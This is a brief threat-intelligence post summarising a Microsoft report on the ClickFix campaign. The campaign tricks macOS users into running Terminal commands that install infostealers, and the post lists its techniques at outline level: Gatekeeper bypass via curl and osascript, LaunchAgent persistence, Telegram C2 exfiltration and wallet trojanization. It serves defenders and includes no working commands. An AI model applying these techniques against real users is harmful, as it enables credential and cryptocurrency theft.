(microsoft.com) Evolution of ClickFix: How Threat Actors Exploit macOS Terminal Commands to Distribute Infostealers

orlysec@swecyb.com

(microsoft.com) Evolution of ClickFix: How Threat Actors Exploit macOS Terminal Commands to Distribute Infostealers

In brief - Threat actors are exploiting macOS Terminal commands via social engineering to distribute infostealers (MacSync, SHub Stealer, AMOS). These attacks bypass Gatekeeper, harvest sensitive data (Keychain, crypto wallets, browser creds), and replace legitimate wallet apps with trojanized versions. High-risk campaign leveraging native utilities for stealth and persistence.

Technically - The ClickFix campaign uses multi-stage execution paths (loader, script, helper) to deploy malware via obfuscated Terminal commands. Techniques include:
- Gatekeeper bypass via `curl`/`osascript` for in-memory execution
- Persistence via LaunchAgents/Daemons
- Data exfil via HTTP POST/Telegram C2
- Anti-VM checks in Mach-O payloads
- Dynamic C2 discovery (Telegram fallback)
- Cryptocurrency wallet trojanization
Monitor Terminal activity, outbound downloads, and script execution to detect.

Source: https://www.microsoft.com/en-us/security/blog/2026/05/06/clickfix-campaign-uses-fake-macos-utilities-lures-deliver-infostealers/

#Cybersecurity #ThreatIntel